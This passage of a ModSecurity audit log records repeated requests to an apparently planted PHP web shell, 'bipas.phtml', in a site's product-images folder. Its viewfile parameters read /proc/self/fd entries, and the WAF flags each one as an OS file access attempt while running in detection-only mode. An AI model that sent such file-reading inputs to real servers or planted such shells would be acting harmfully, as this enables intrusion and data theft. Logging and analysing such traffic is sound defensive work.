"/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/197"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/197"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5mmj9J38fG6WAr4pinAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120858670660 4986 (- - -) Stopwatch2: 1750120858670660 4986; combined=2697, p1=451, p2=2114, p3=38, p4=38, p5=56, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ffda7678-Z-- --7603b807-A-- [17/Jun/2025:06:10:58.765208 +0530] aFC5moiFNOCfBactc_VFwgAAAAE 216.73.216.240 52898 127.0.0.1 7081 --7603b807-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F62 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7603b807-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --7603b807-H-- Message: Warning. Matched phrase "proc/self/fd/6" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/6 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/62"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/6" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/6 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/62"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5moiFNOCfBactc_VFwgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120858760716 4563 (- - -) Stopwatch2: 1750120858760716 4563; combined=2385, p1=382, p2=1863, p3=39, p4=38, p5=62, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7603b807-Z-- --713e3551-A-- [17/Jun/2025:06:10:58.859080 +0530] aFC5mu3Ib0Hp5z3ImsFoXAAAAAc 216.73.216.240 52910 127.0.0.1 7081 --713e3551-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F172 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --713e3551-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --713e3551-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/172"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/172"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5mu3Ib0Hp5z3ImsFoXAAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120858854038 5116 (- - -) Stopwatch2: 1750120858854038 5116; combined=2778, p1=428, p2=2188, p3=44, p4=41, p5=77, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --713e3551-Z-- --73c14034-A-- [17/Jun/2025:06:10:59.038686 +0530] aFC5m4oVQnPDyHnl9oPePgAAAAY 216.73.216.240 52922 127.0.0.1 7081 --73c14034-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F89 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --73c14034-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --73c14034-H-- Message: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/89"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/89"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5m4oVQnPDyHnl9oPePgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120859034782 3957 (- - -) Stopwatch2: 1750120859034782 3957; combined=2030, p1=338, p2=1565, p3=37, p4=34, p5=56, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --73c14034-Z-- --e6cdf572-A-- [17/Jun/2025:06:11:02.588781 +0530] aFC5nmj9J38fG6WAr4piogAAAAk 216.73.216.240 51074 127.0.0.1 7081 --e6cdf572-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F86 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e6cdf572-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --e6cdf572-H-- Message: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/86"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/86"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5nmj9J38fG6WAr4piogAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120862584378 4458 (- - -) Stopwatch2: 1750120862584378 4458; combined=2281, p1=392, p2=1735, p3=35, p4=55, p5=63, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e6cdf572-Z-- --cef5c13a-A-- [17/Jun/2025:06:11:03.498997 +0530] aFC5n1JfblPUQiSn5r2cPQAAAAA 216.73.216.240 51170 127.0.0.1 7081 --cef5c13a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F204 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --cef5c13a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --cef5c13a-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/204"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/204"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5n1JfblPUQiSn5r2cPQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120863494172 4881 (- - -) Stopwatch2: 1750120863494172 4881; combined=2652, p1=392, p2=2120, p3=39, p4=37, p5=63, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cef5c13a-Z-- --fd7e9419-A-- [17/Jun/2025:06:11:04.410213 +0530] aFC5oAJ4p5Cdblnjra6CuAAAAAI 216.73.216.240 51276 127.0.0.1 7081 --fd7e9419-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F107 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --fd7e9419-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --fd7e9419-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/107"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/107"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5oAJ4p5Cdblnjra6CuAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120864404644 5640 (- - -) Stopwatch2: 1750120864404644 5640; combined=3118, p1=481, p2=2453, p3=54, p4=47, p5=83, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fd7e9419-Z-- --090ff034-A-- [17/Jun/2025:06:11:04.862860 +0530] aFC5oO3Ib0Hp5z3ImsFoZQAAAAc 216.73.216.240 51340 127.0.0.1 7081 --090ff034-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F156 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --090ff034-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --090ff034-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/156"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/156"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5oO3Ib0Hp5z3ImsFoZQAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120864858130 4786 (- - -) Stopwatch2: 1750120864858130 4786; combined=2523, p1=413, p2=1968, p3=39, p4=38, p5=65, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --090ff034-Z-- --13853a6b-A-- [17/Jun/2025:06:11:06.147513 +0530] aFC5on4j6VFpohzeqUMWlAAAAAo 216.73.216.240 51516 127.0.0.1 7081 --13853a6b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F162 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --13853a6b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --13853a6b-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/162"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/162"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5on4j6VFpohzeqUMWlAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120866143080 4489 (- - -) Stopwatch2: 1750120866143080 4489; combined=2361, p1=378, p2=1847, p3=37, p4=37, p5=61, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13853a6b-Z-- --0584a42c-A-- [17/Jun/2025:06:11:06.695392 +0530] aFC5ogJ4p5Cdblnjra6CugAAAAI 216.73.216.240 51592 127.0.0.1 7081 --0584a42c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F44 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0584a42c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --0584a42c-H-- Message: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/44"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/44"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5ogJ4p5Cdblnjra6CugAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120866689732 5739 (- - -) Stopwatch2: 1750120866689732 5739; combined=3191, p1=508, p2=2495, p3=55, p4=51, p5=82, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0584a42c-Z-- --e8fbf57c-A-- [17/Jun/2025:06:11:07.240798 +0530] aFC5o4iFNOCfBactc_VFzwAAAAE 216.73.216.240 51634 127.0.0.1 7081 --e8fbf57c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F2 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e8fbf57c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2987 Connection: close Content-Type: text/html; charset=UTF-8 --e8fbf57c-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5o4iFNOCfBactc_VFzwAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120867235146 5730 (- - -) Stopwatch2: 1750120867235146 5730; combined=3185, p1=489, p2=2489, p3=53, p4=69, p5=85, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e8fbf57c-Z-- --6a2e871f-A-- [17/Jun/2025:06:11:07.589583 +0530] aFC5o34j6VFpohzeqUMWlgAAAAo 216.73.216.240 51668 127.0.0.1 7081 --6a2e871f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F146 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6a2e871f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --6a2e871f-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/146"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/146"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5o34j6VFpohzeqUMWlgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120867507509 82138 (- - -) Stopwatch2: 1750120867507509 82138; combined=157482, p1=370, p2=1948, p3=38, p4=35, p5=77575, sr=101, sw=1, l=0, gc=77515 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6a2e871f-Z-- --58932f26-A-- [17/Jun/2025:06:11:07.602122 +0530] aFC5o2j9J38fG6WAr4piqgAAAAk 216.73.216.240 51682 127.0.0.1 7081 --58932f26-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F92 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --58932f26-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --58932f26-H-- Message: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/92"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/92"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5o2j9J38fG6WAr4piqgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120867598049 4126 (- - -) Stopwatch2: 1750120867598049 4126; combined=2168, p1=353, p2=1692, p3=35, p4=32, p5=55, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for 